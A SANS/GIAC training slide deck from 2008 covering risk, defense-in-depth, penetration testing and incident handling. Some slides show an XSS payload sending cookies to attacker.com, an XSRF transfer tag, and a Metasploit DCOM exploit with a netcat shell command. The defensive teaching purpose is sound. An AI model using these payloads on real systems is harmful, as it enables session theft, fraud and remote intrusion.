Frontline solutions For Security Practitioners 1008

Frontline Solutions for
Security Practitioners
A presentation of
The Internet Storm Center,
The SANS Institute and
The GIAC Certification Program
Frontline Solutions for Security Practitioners SANS/GIAC 2008®

About Me
Rick Wanner B.Sc. I.S.P.
• Client Technology Manager, Security at SaskTel
• Areas of expertise
– Secure Network Architecture, Penetration Testing
– IDS, Policy Development and compliance
• Masters Student at STI (SANS Technology Institute)
• Handler at the Internet Storm Center (isc.sans.org)
• Independent contractor/Volunteer with SANS/GIAC
• rwanner@pobox.com

Program Overview - GIAC Certification © 2006 2

The Internet Storm Center

• The Internet Storm Center acts as a distributed early
warning system for the Internet
• The ISCs principal inputs come from Dshield.org and
Internet users
• The ISC acts as an intermediary with ISPs worldwide.
• The ISC is composed of approximately 40 volunteer
handlers which coordinate a group of volunteer intrusion
analysts and malware specialists.
• Daily blog/diary published at http://isc.sans.org/
• Sponsored by the SANS Institute.


SANS Training and
GIAC Certifications
• SANS Institute is the leading training
organization for system administration, audit,
network, security and security management.
• GIAC, The Global Information Assurance
Certification program, provides assurance that a
certified individual meets a minimum level of
ability and possesses the skills necessary to do
the job.


Today‘s Cyber Threats

• Cyber threats have certainly changed since Al Gore
invented the internet.
• What started off as an innocuous invention by ARPANET
and supported by the U.S. Department of Defense, is
now a significant vehicle for conducting business,
shopping, banking, researching, communicating, and
maintaining vital corporate information
• Unfortunately it‘s also a haven for hackers and intrusive
malicious code.


The Internet

•The Internet is a community of individuals with
its good neighbourhoods and bad neighborhoods.
•In this community the bad neighborhoods are
only separated from the good neighbourhoods by
at most 150 milliseconds.


The Need for Information Security

• While you are working hard to protect your
organization‘s critical information and systems, there are
others out there who want to compromise it.
• Learning the appropriate actions to secure this
information not only benefits your employer, clients,
and stockholders, it benefits you.
• In this industry, you don‘t want to be the one who
learned the hard way.


Security Outlook

• As users get more sophisticated, so do the bad guys.
• A CA, Inc. report issued on January 29, 2007 stated that:
• In 2006, trojans accounted for 62% of all malware; worms 24%; and
viruses and other types of malware accounted for the remaining 13%.
• CA, Inc predicts that attackers will use blended threats to steal private
information and perpetrate other attacks
– Phishers are getting smarter
– Spam will increase
– Targeted attacks will increase
– A rise in the use of kernel rootkits
– Increased exploitation of browser and application vulnerabilities
– Typo-squatting on search engines will increase
– Attacks are increasingly sophisticated.

Presentation Overview

• A brief look at risk
• Security Mitigation Strategies
– Defense-in-Depth
– Penetration Testing
– Incident Handling


Focus of Security is Risk

• Security deals with managing risk to your critical assets
• Security is basically an exercise in loss reduction
• It‘s impossible to totally eliminate risk – we settle for
residual risk
• Risk is the probability of a threat crossing or touching a
vulnerability
• Risk is managed by applying security controls
• Risk = threat x vulnerabilities


Key Focus of Risk

• Confidentiality/Disclosure
• Integrity/Alteration
Confidentiality
• Availability/Destruction

Integrity Availability


Prioritizing CIA

• While all three areas of CIA are important to an organization, there
is always one area that is more critical than the others
• Confidentiality
– Health care organizations
– Hospitals
• Integrity
– Financial institutions
– Banks
• Availability
– E-commerce-based organizations
– Online banking


What is a Threat?

• Possible danger
• Protect against the ones
that are most likely or
most worrisome based 5 Primary
Threats
on:
• Intellectual property
• Business goals Natural
Disasters
• Validated data
• Past history
• Main point of exposure


Vulnerabilities

• Vulnerabilities are weaknesses in a system
• Vulnerabilities are inherent in complex systems; they will always be
present
• The majority of vulnerabilities are the result of poor coding
practices
• Lack of error checking
• Vulnerabilities are the gateway by which threats are manifested
• Vulnerabilities fall into two categories
– Known – those you can protect against
– Unknown or ―zero day‖


Defense-in-Depth

• We deploy Defense-in-Depth to manage
and mitigate risk.


What is Defense-in-Depth?

• There is no ―silver bullet‖ when it comes to
network security
• Any layer of protection might fail
• Multiple levels of protection must be deployed
• Measures must be across a wide range of
controls (preventive and detective)


Approach to Defense-in-Depth

• Deploy measures to reduce, eliminate, or
transfer risk
• Four basic approaches
– Uniform protection
– Protected enclaves
– Information centric
– Threat vector analysis


Uniform Protection
Defense-in-Depth
• Most common approach to DiD
• Firewall, VPN, Intrusion Detection, Antivirus,
etc.
• All parts of the organization receive equal
protection
• Particularly vulnerable to malicious insider
attacks


Protected Enclaves
Defense-in-Depth
• Work groups that require additional protection
are segmented from the rest of the internal
organization
• Restricting access to critical segments
• DOE ―unclean‖ network
• System of VPNs
• Internal Firewalls
• VLANs and ACLs


Information Centric
Defense-in-Depth
• Identify critical assets
Network
and provide layered
protection
Host • Data is accessed by
applications
Application
• Applications reside on
Info hosts
• Hosts operate on
networks

Vector-Oriented
Defense-in-Depth
• The threat requires a vector to cross the
vulnerability
• Stop the ability of the threat to use the
vector:
– USB Thumb Drives – Disable USB
– Floppy Drives – Disable
– Auto Answer Modems – Digital phone PBX


Identity, Authentication,
Authorization, and Accountability
• Identity is who you claim to be
• Authentication is a process by which you prove you
are who you say you are:
• Something you know
• Something you have
• Something you are
• Some place you are

• Authorization is determining what someone has
access to or is allowed to do after authentication
• Accountability deals with knowing who did what and
when


Controlling Access

• Least Privilege
– Give someone the least amount of access required to do their
job
• Need to Know
– Only give them the access when they need it – and take it away
when it is no longer required
• Separation of Duties
– Break critical tasks across multiple people to limit your points of
exposure
• Rotation of Duties
– Change jobs on a regular basis to prevent anyone from being able to get
comfortable in a position and therefore, be able to cover their tracks


―Protection is ideal, detection is
a must‖
• You cannot protect against every
possible threat.
• Instrument your security so that you
can detect the threat or at very least
so you have data available to analyze
the attack after the fact.


Penetration Testing

• Penetration testing is discovering
vulnerabilities to your networks,
systems, applications and data before
the bad guys do.
• Penetration testing simulates the
generalized attack methodology.


Generalized Attack Methodology

• Reconnaissance
• Scanning
• Gaining Access
• Maintaining Access
• Covering Tracks


Penetration Testing Method

• Preparation
• Reconnaissance
• Scanning
• Exploitation
• Analysis
• Reporting

Preparation

• Define the parameters of the test.
– Objectives
– Scope
– Roles and responsibilities
– Limitations
– Success factors
– Timeline
– Documented Permission

Reconnaissance

• Reconnaissance determines…‖What
can a potential attacker learn about
your company?‖
• Utilizes publicly available information.


Reconnaissance (2)

• Some sources of information:
– Search Engines
– Websites
– Registrars
– SEC
– Recruiting sites
– Netcraft.com

Reconnaissance (3) - Netcraft


Reconnaissance (4) - Netcraft


Scanning

• Now we know where to look, let‘s dig in a
little deeper.
• Generally you are going to use two types
of scanners, port scanners, and
vulnerability scanners.
• The hackers choice:
– Nmap
– Nessus

Nmap

• Nmap – open sourced port scanner
• Usually start with discovery scans
and progress to targeted scans.
• Runs on Windows and *nix.
• Available from nmap.org


Nmap - Discovery

• nmap –F <Address>
• nmap –F 192.168.1.0/24


Nmap - Targeted

• nmap -F –A <address>
• nmap -F –A 192.168.1.200


Vulnerability Scanner

• Nessus –open
sourced VA
scanner
• Vulnerability feed
costs money.


Commercial Vulnerability
Scanners

Rapid7 NeXpose

GFI LANguard
eEye Retina Network

Application Attacks

• Now we have all these layers of
protection. Are you still vulnerable?
• The fact is that you can‘t deny what
you must permit.
• What about application level attacks?


Cross-Site Scripting

• Allows code injection by malicious
web users into the web pages viewed
by other users.
• Root cause - lack of input filtering
and validation
• Permits attacker to execute arbitrary
scripts on the browser

Cross Site Scripting (2)

• Code
<script>document.write(‗<img
src=http://www.attacker.com/‘ + document.cookie +
‗>‘)</script>

• Result
192.168.231.131 - - [21/Jan/2008:10:36:31 -0500] "GET
/PHPSESSID=b37a25a01745b6d2a5df876e45dabf60 HTTP/1.1"
404 240


Cross-Site Scripting (3)


Yahoo's HotJobs site vulnerable to cross-site
scripting attack
Dan Kaplan - October 27 2008

Internet research firm Netcraft's toolbar has detected a cross site scripting bug in Yahoo that could
be exploited to steal authentication cookies.

The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious
JavaScript code, Netcraft's Paul Mutton said in a blog post on Sunday.

"The script steals the authentication cookies that are sent for the Yahoo.com domain and passes
them to a different website in the United States, where the attacker is harvesting stolen
authentication details," Mutton wrote.

The pilfered credentials could enable the attackers access to the victims' Yahoo acounts, including
email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said.

"Simply visiting the malign URLs on Yahoo.com can be enough for a victim to fall prey to the
attacker, letting him steal the necessary session cookies to gain access to the victim's email — the
victim does not even have to type in their username and password for the attacker to do this,"
Mutton wrote. "Both attacks send the victim to a blank webpage, leaving them unlikely to realize that
their own account has just been compromised."


Cross Site Scripting Demo

• Steals the session cookie and then
masquerades as the user.


Cross-Site Request Forgery
(XSRF)
• Unauthorized commands are
transmitted from a user that the
website trusts.
• Exploitation of an existing web
session.
• Embedded code causes unauthorized
actions

XSRF (2)

• Code
<img
src=http://www.acmefinancial.com/transaction.php?src
_acct=0128428&dst_acct=0183718&amount=5000>
• Result
192.168.231.131 - - [21/Jan/2008:12:33:31 -0500]
"GET/transaction.php?src_acct=0128428&dst_acct=018
3718&amount=5000 HTTP/1.1" 200 2240


SQL Injection Demo

• SQL statements are injected into user input to
see if a response is returned.
• Extreme Defense in Depth
– Firewall, network segmentation
– System patching, SSL communications
• Results
– Authentication Bypass
– Unauthorized data access


Preventing Web Application
Attacks
• Every input should be validated!
• ―Suspicion Breeds Confidence‖
– Test it!


Nikto

• Open source Linux based web
application scanner
• Available at
http://www.cirt.net/nikto2


Nikto (2)

• Basic Scan
perl nikto.pl –h <host>
perl nikto.pl –h 192.168.1.1
• Multiple ports
perl nikto.pl –h 192.168.1.1 –p 80,88,443


Nikto – Simple Scan
[root@rwanner nikto]# ./nikto.pl -h localhost
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 80
+ Start Time: 2008-10-27 21:53:47
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does
not mean it is vulnerable to XST.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-
mirror/WhitePaper_screen.pdf for details
+ OSVDB-3092: GET /manual/ : Web server manual found.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 9 item(s) reported on remote host
+ End Time: 2008-10-27 21:54:28 (41 seconds)


Nikto (3)

• Multiple hosts
perl nikto.pl –h <filename>
perl nikto.pl –h hosts.txt
• Hosts file
192.168.1.1:80:443
192.168.0.200
192.168.0.200,443


Nikto – Multiple Hosts Scan
]# ./nikto.pl -h hosts.txt
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 192.168.1.1
+ Target Hostname: 192.168.1.1
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Ciphers: DES-CBC3-SHA
Info: /C=US/ST=California/L=Irvine/O=Cisco-Linksys,
LLC/OU=Division/CN=Linksys/emailAddress=support@linksys.com
Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys,
LLC/OU=Division/CN=Linksys/emailAddress=support@linksys.com
+ Start Time: 2008-10-28 21:16:37
---------------------------------------------------------------------------
+ Server: No banner retrieved


Commercial Web Scanners

IBM Rational AppScan
HP Webinspect

Cenzic Hailstorm

Exploitation

• Once you identify a potential vulnerability
you have choices:
– Can use individual exploits…available via the
Internet
– Can use pre-built exploitation frameworks.
• The most popular exploitation framework
is Metasploit.
– Available for Windows or Linux
– Available at http://www.metasploit.com/

Metasploit

• 3 primary components
– Exploit
• Stack/Heap based buffer overflow
• Insecure coding
• PHP vulnerability, IIS Unicode, SQL injection, etc.

– NOP sled (optional - exploit dependent)
– Payload
• Shellcode
• Encoders
• Other (exploit dependent)

Metasploit

#./msfconsole  start Metasploit
msf > use windows/dcerpc/ms03_026_dcom
msf > setg PAYLOAD windows/exec
msf > setg CMD nc –L –p 80 cmd.exe
msf > setg RHOST 192.168.0.2
msf > exploit


Exploitation Demo

• Patching and Configuration
– Lacking patch management procedures
– Single inbound port open through firewall
• Results
– Simple remote exploitation
– Worm characteristics
– Can be used to bypass firewalls


Commercial Tools

Core 2006
Program Overview - GIAC Certification ©
Impact
Frontline Solutions for Security Practitioners SANS/GIAC 2008® 59

Analysis

• When you finish you will have a
mountain of data to analyze.
• Break it down by a risk based
approach.


Reporting

• Base your report on risk.
• Write it so your senior executives can
understand.
• Provide recommendation based on
standards or best practices.
• Keep the Executive summary short.
• Stay away from FUD!

Handling an Incident

• Now that you are aware of threats,
let‘s take a look at how to handle an
incident once it occurs.


What Is Incident Handling?

• Incident Handling is an action plan for dealing with the
misuse of computer systems and networks:
– Intrusions
– Malicious code infection
– Cyber-theft
– Denial of Service
– Other security-related events
• Have written procedures and policies in place so you
know what to do when an incident occurs.


Why is Incident Handling
Important?
• Sooner or later an incident is going to occur
– Do you know what to do?
• It is not a matter of ―if‖ but ―when‖
• Planning is everything
• Similar to backups
– You might not use them everyday, but if a major
problem occurs, you are going to be glad that you
have them available


Incident Definition

• The term ―incident‖ refers to an adverse event in an
information system and/or network…
• …or the threat of the occurrence of such an event
• Focus is on detecting deviations from the normal state
of the network and systems
• Examples of incidents include:
– Unauthorized use of another user‘s account
– Unauthorized use of system privileges
– Execution of malicious code that destroys data
• Incident implies harm, or the attempt to harm


Event Definition

• An ―event‖ is any observable occurrence in a system and/or
network
• Examples of events include:
– The system boot sequence
– A system crash (could be normal behavior for that system)
– Packet flooding within a network (could be bursty legit traffic)
• These observable events provide the bulk of your organization‘s
case if the perpetrator of an incident is caught and prosecuted
– Must be recorded in notebooks and logs
– Recording the same event in multiple places helps improve evidence – that‘s
corroborating evidence


Incident Handling Phases

• Preparation
– Create the incident handling team, implement policy, allocate resources
– Prepare how incidents are communicated
• Identification
– Detect incidents through alerts and audit logs on network perimeter, host
perimeter, and host systems
– Enforce a need-to-know policy
– Out of band communications, such as cell phones, may be appropriate if the
network has been compromised
• Containment
– Stop the bleeding
– Survey the situation and inform management


Incident Handling Phases

• Eradication
– Remove artifacts of the incident and determine the cause
– Perform a recovery from known-good backups (rebuild in the case of a
rootkit installation)
– Improve network and host defenses appropriately
• Recovery
– Place the system back into production
– Validate the system integrity and function
– Monitor for further suspicious events
• Lessons Learned
– Create a follow-up report and look for ways to improve the incident
handling processes


Six Primary Phases

Preparation Steady State

Identification Declare an Incident

Steady State Containment Start Clean-Up

Eradication Finish Clean-Up

Recovery Back in Production

On occasion, we may Lessons Learned Done
be forced to jump
back…


Data Recovery Demo

• Incident Recovery
– Data deleted from a system
– Could be accidental or malicious
• Recovery Steps
– Bit-for-bit image of storage device
– Data recovery using autopsy


Seven Deadly Sins
Chronological Order
1. Failure to report or ask for help
2. Incomplete/non-existent notes
3. Mishandling/destroying evidence
4. Failure to create working backups
5. Failure to contain or eradicate
6. Failure to prevent re-infection
7. Failure to apply lessons learned


Incident Handling Summary

• Incident Handling is similar to first aid
• The caregiver is under pressure and mistakes can be costly
• A simple, well-understood documented approach is best
• Keep the six stages in mind – Preparation Identification,
Containment, Eradication, Recovery, and Lessons Learned
• Use pre-designed forms, and ask for help
– http://www.sans.org/score/incidentforms
– Forms include Incident Contact List, Identification Checklist,
Survey, Containment Checklist, Eradication Checklist, and
Communication Log


Share Your Experiences

• If your computer policy will allow it, share what you have learned
with other incident handlers and response teams
– Attacks against computers are happening everywhere, all the
time
– The bad guys share information; if we incident handlers do not
share with each other, they‘ll stay a step ahead
– Coordinating your efforts with those on other teams is a critical
facet of incidence response
– Do as they told you in kindergarten: Share
– The Internet Storm Center (isc.sans.org) is a wonderful point of
communication. A handler is on duty everyday


How To Apply This Information

• This material is a starting point to create a set of
incident handling procedures tailored to your
environment
• Remember, incident handling is not a ―one-size-fits-all‖
activity
– But there are common principles we all must consider
• As you work through the process, ask yourself:
– ―If an incident occurred, would I be really thankful I had done
that?‖
– ―Would I be really sorry if I hadn‘t done that?‖


Presentation Summary

• Security programs should be about
risk, not technology, not FUD.
• ―Protection is ideal, detection is a
must.‖
• Know what the attackers know.
• Be prepared for when an attack does
come.

What We‘ve Learned

• The information you have learned today comes from
three of SANS‘ most popular security courses.
• Defense-in-Depth is part of SEC401: Security
Essentials - Bootcamp Style or GSEC
• The penetration testing overview is related to SEC560:
Network Penetration Testing and Ethical Hacking
or GPEN.
• The incident handling overview is based on SEC504:
Hacker Techniques, Exploits and Incident
Handling or GCIH.


Free GIAC Assessment

• We‘ve covered a lot of information today. To help
reinforce what you‘ve learned and test your
knowledge, we have created a short 20 question
assessment.
• If you would like to take advantage of this free GIAC
assessment, please write your name and email
address on the sign up sheet.
• Within the next 10 days, GIAC will send you an email
with a link to access the assessment, but you will not
be placed on our mailing list unless you opt-in.


SANS/GIAC Overview


SANS Training and
GIAC Certifications
• SANS Institute is the leading training
organization for system, audit, network, and
security.
• GIAC, The Global Information Assurance
Certification program, provides assurance that a
certified individual meets a minimum level of
ability and possesses the skills necessary to do
the job.


SANS and GIAC
Guiding Principles
• Education
– Current, Evolving and Proven Material
– Certifications that prove you have the knowledge
and skills to get the job done
• Hands-On
– Hands-on training conducted by instructors who
are experts in their fields
– Testing process that evaluates hands-on
capabilities
• Community
– Listening and learning to the community‘s needs
– Giving vital knowledge back to the community


How SANS and GIAC Are Different
From Other Training/Certifications

• SANS and GIAC constantly update course and
certification information to keep you on top of
current threats and vulnerabilities.
• We use real-world, hands-on scenarios.
• While tools are an important part of IT security, we
teach you and validate actual skills, so you don‘t
have to solely rely on the performance of a tool.
• The SANS Promise - You will be able to apply our
information security training the day you get back
to the office.


GIAC Certification

GIAC Silver Certifications
– Multiple choice exams only
GIAC Gold Certifications
– Plus a written technical report

GIAC Platinum Series
– Highest certification level

82

Top 3 Reasons to Earn Your
GIAC Certification
1.Hiring managers use GIAC certifications
to ensure that candidates actually possess
deep technical skills
2.GIAC certifications help IT Security
Professionals get promoted faster and
earn more money
3.GIAC certification reinforces and affirms
the 'hands on' knowledge you possess

What Certified People Say?

"The GIAC certification has enabled me to take the next step in my
Information Security career. It allowed me to prove that my value was more
than just that of a security minded Sys Admin."
–J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center

"The SANS hands-on experience and the intensive GIAC certification process
has garnered me the respect of my boss and peers. Now, when I speak,
people listen. I have the confidence to get the job done. My boss looks at
me with respect that simply wasn't there before SANS training and GIAC
certification. Not only my boss, but managers and peers at other large
organizations.― Matt Carpenter, Enterprise Information Systems

GIAC certifications help IT Security Professionals get
promoted faster and earn more money…

GIAC Certifications

• GSEC - Security Essentials • GISF - Information Security Fundamentals
• GCFW - Firewall Analyst • GSAE - Security Audit Essentials
• GCIA - Intrusion Analyst • GSLC - Security Leadership
• GCIH - Incident Handler • GSNA - System & Network Auditor
• GCFA - Forensics Analyst • G7799 - ISO 17799/27001
• GCUX - Unix Security • GISP - Information Security Professional
• GCWN - Windows Security • GCIM - Incident Manager
• GNET - . NET • GAWN - Auditing Wireless Networks
• GSOC - Securing Oracle • GREM - Reverse-Engineering Malware
• GSSP-JAVA - Secure Coding • GPEN - Penetration Tester
• GSSP-C - Secure Coding • GCPM - IT Project Management
For a complete list of GIAC Certifications
http://www.giac.org/certifications/roadmap.php

Free Resources

• SANS and GIAC have a variety of free resources readily available at
www.sans.org and www.giac.org
• Here‘s a sample of what we offer:
• Internet Storm Center
• SANS reading room - http://www.sans.org/reading_room
• Top 15 Malicious Spyware Actions
• SANS Security Policy Samples
• The Internet Guide to Popular Resources on Information Security
• FAQ‘s
• SCORE
• Security Tool White Papers and GIAC Gold Papers
• Glossary of Security Terms

Thank You!

Questions:
info@sans.org
info@giac.org

Frontline solutions For Security Practitioners 1008

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Frontline solutions For Security Practitioners 1008

Similar to Frontline solutions For Security Practitioners 1008 (20)

Recently uploaded

Recently uploaded (20)

Frontline solutions For Security Practitioners 1008

Editor's Notes